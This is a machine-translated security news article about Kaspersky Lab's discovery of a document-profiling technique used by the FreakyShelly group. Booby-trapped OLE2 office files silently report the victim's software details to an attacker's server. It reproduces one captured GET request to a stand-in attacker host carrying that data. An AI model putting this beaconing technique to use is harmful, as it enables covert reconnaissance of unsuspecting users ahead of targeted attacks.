Search for vulnerabilities in the protection of computers based on the OLE2 file format

Kaspersky Lab experts have detected a feature in popular document creation software that has been used by cybercriminals to carry out effective targeted attacks. By using a malicious application that activates when you open a simple office document, attackers are automatically sent, without user interaction, information about the software installed on the victim device. Thanks to such data criminals find out what type of malicious program should be used to break into a given device.

It does not matter on which device the document is opened: the attack technique works in both versions of the popular text editing software: mobile and designed for desktop computers. Kaspersky Lab observed the use of this profiling method by at least one cybercriminal group, which the researchers from the company gave the name FreakyShelly. Kaspersky Lab reported the matter to the software developer, however the vulnerability has not yet been fully patched.


This is what a malicious document may look like.

Some time ago, when investigating FreakyShelly targeted attacks, Kaspersky Lab experts identified phishing messages in the OLE2 format (they use technology that helps applications create complex documents that contain information from various sources, including the internet). A quick preview of the file did not arouse suspicion. It included a set of useful tips on how to make the most of Google search, and did not hide any known malicious programs or macros. However, when the experts took a closer look at how the document behaves, it turned out that after opening it sends information about the browser used on the device, the version of the operating system and data about other software installed on the attacked device. The problem was that these data were sent to the address they should not have been sent to.

GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc 
HTTP / 1.1
Accept: * / *
User-Agent: Mozilla / 4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident / 4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0;. NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive 

Further investigation of Kaspersky Lab showed that this attack is possible due to the way in which the technical information about its elements is processed and stored inside the document. Each digital document contains certain metadata that relate to its style, location and source, indicate where images should be taken (if any), and other parameters. After opening, the office application reads these parameters and then creates a document using them as a "map". The results of a study conducted by researchers from Kaspersky Lab suggest that the parameter that is responsible for indicating the location of images used in the document, can be changed by attackers through sophisticated code manipulation, and make the document "report" on a website owned by a cybercriminal group.

Although this feature does not allow malware attacks, it is dangerous because it can effectively support malicious activity without requiring almost any interaction on the part of the user, and can affect many people in the world due to the popularity of the software. So far, this function has been used in only one case. However, due to the fact that it is really difficult to detect, we expect that in the future more cybercriminal groups may start using this technique - said Alexander Liskin, the manager of the heuristic detection group, Kaspersky Lab.

A full study on the new profiling technique is available at http://r.kaspersky.pl/Hsv4q.



Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.